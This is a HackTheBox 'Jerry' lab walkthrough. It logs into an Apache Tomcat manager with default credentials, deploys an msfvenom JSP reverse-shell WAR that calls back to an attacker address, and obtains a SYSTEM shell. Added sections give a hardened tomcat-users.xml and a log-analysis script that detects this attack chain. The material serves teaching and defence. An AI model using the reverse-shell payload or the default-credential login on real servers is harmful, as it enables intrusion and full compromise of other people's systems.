hackthebox jerry walkthrough

Starting with nmap

# nmap -sC -sV 10.10.10.95 -oA jerry
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 04:02 EDT
Nmap scan report for 10.10.10.95
Host is up (0.16s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.45 seconds

Only port 8080 is open, serving Apache Tomcat 7.0.88.

hackthebox – jerry – tomcat

Click on Manager App

hackthebox – jerry – tomcat manager

Log in with the default credentials tomcat/s3cret.
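The reason the default login works is the manager user defined in conf/tomcat-users.xml. As an added example (not taken from the box), here is the weak definition that matches what the documentation's manager example ships with, next to a hardened version; the username and the password placeholder in the hardened user are assumptions, not values from the page:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- conf/tomcat-users.xml (example, not the box's own file) -->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
              version="1.0">

  <!-- WEAK: the documentation's example account, copied verbatim into production.
       Guessable name and password, and manager-gui exposes the HTML upload form.
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  -->

  <!-- HARDENED: only grant the role actually needed (manager-script for CI
       deployments, no GUI), with a unique username and a long random password.
       'deploy-svc' and the password value are placeholders to be replaced. -->
  <role rolename="manager-script"/>
  <user username="deploy-svc"
        password="REPLACE_WITH_LONG_RANDOM_PASSWORD"
        roles="manager-script"/>

  <!-- If nothing deploys through the manager at all, define no manager-* roles
       and remove webapps/manager entirely; an app that is not there has no
       password to guess. -->
</tomcat-users>
```

Two companion checks belong with this file: the manager application's own webapps/manager/META-INF/context.xml can carry a `RemoteAddrValve` whose `allow` attribute restricts which source addresses may reach it, so a manager that is only used from localhost or a deployment host never answers a login prompt to the rest of the network; and the `whoami` output later in this walkthrough is the second finding to act on, since a Tomcat service running as a dedicated low-privilege account would have turned a deployed shell into a foothold rather than an instant SYSTEM compromise.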

Next, create a WAR file containing a reverse shell and deploy it through the manager.

# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.44 LPORT=4444 -f war > shell.war
Payload size: 1096 bytes
Final size of war file: 1096 bytes

Upload it through the manager's WAR deployment form and browse to http://10.10.10.95:8080/shell/ to trigger it.

The listener catches a shell running as NT AUTHORITY\SYSTEM, the account the Tomcat service runs under:

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.44] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
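Everything above leaves a trail in Tomcat's access log (logs/localhost_access_log.*.txt, written by the AccessLogValve in its default `%h %l %u %t "%r" %s %b` pattern): failed manager logins, the successful WAR upload, and the first request to the freshly created context. As an added example, not part of the original walkthrough, the script below parses log lines in that format and flags those three events. The sample lines are constructed for this example; the `/manager/html/upload` and `/manager/text/deploy` paths are Tomcat's real deployment endpoints, everything else (addresses, timestamps, the CSRF nonce) is made up. The "new context after a deployment" heuristic is deliberately coarse and should be tuned against a baseline of known contexts on a real server.

```python
import re
from collections import Counter
from typing import Dict, List, Optional

# AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Tomcat manager deployment endpoints: HTML form upload (POST) and text interface (PUT).
MANAGER_DEPLOY = re.compile(r'^/manager/(html/upload|text/deploy)$')

# Constructed sample log (not captured from the box): two failed manager logins,
# a successful login, a WAR upload, the first hit on the new /shell context, and
# ordinary traffic to /docs before and after the deployment.
SAMPLE_LOG = """\
192.168.1.20 - - [20/Jul/2019:04:01:00 -0400] "GET /docs/ HTTP/1.1" 200 14921
10.10.14.44 - - [20/Jul/2019:04:03:01 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.44 - - [20/Jul/2019:04:03:05 -0400] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.44 - tomcat [20/Jul/2019:04:03:09 -0400] "GET /manager/html HTTP/1.1" 200 19401
10.10.14.44 - tomcat [20/Jul/2019:04:04:30 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 19890
10.10.14.44 - - [20/Jul/2019:04:04:41 -0400] "GET /shell/ HTTP/1.1" 200 -
192.168.1.20 - - [20/Jul/2019:04:10:00 -0400] "GET /docs/ HTTP/1.1" 200 14921
"""


def parse_line(line: str) -> Optional[Dict]:
    """Parse one access-log line into a dict, or None if it is not in the expected format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def context_of(path: str) -> str:
    """Return the web application context ('/manager', '/shell', '/') for a request path."""
    path_only = path.split("?", 1)[0]
    segments = path_only.split("/")
    return "/" + (segments[1] if len(segments) > 1 else "")


def analyze(log_text: str, failed_threshold: int = 2) -> List[Dict]:
    """Walk the log in order and emit findings for manager abuse patterns."""
    findings: List[Dict] = []
    failed_by_host: Counter = Counter()
    seen_contexts = set()
    deployment_seen = False

    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue  # skip lines that are not in AccessLogValve common format
        path_only = rec["path"].split("?", 1)[0]
        context = context_of(rec["path"])

        if context == "/manager":
            if rec["status"] == 401:
                # Repeated 401s on the manager: password guessing or default-credential probing.
                failed_by_host[rec["host"]] += 1
                if failed_by_host[rec["host"]] == failed_threshold:
                    findings.append({"kind": "manager_auth_failures",
                                     "host": rec["host"], "count": failed_threshold})
            elif (rec["status"] == 200 and rec["method"] in ("POST", "PUT")
                  and MANAGER_DEPLOY.match(path_only)):
                # A WAR was accepted by the manager: record who deployed it and from where.
                deployment_seen = True
                findings.append({"kind": "manager_deploy", "host": rec["host"],
                                 "user": rec["user"], "path": path_only})
        elif deployment_seen and context not in seen_contexts:
            # First request to a context that did not exist before the deployment:
            # the freshly deployed application is being invoked.
            findings.append({"kind": "new_context_access",
                             "host": rec["host"], "context": context})
        seen_contexts.add(context)

    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Run against a real localhost_access_log file, the same three findings are what an analyst would want correlated with the Tomcat service account: a deploy followed by a first hit on a new context from the same external address, minutes after a burst of 401s, is the whole chain of this box in three log lines.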

With SYSTEM privileges we can read the flag straight from the Administrator's desktop:

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is FC2B-E489

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,601,879,040 bytes free
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
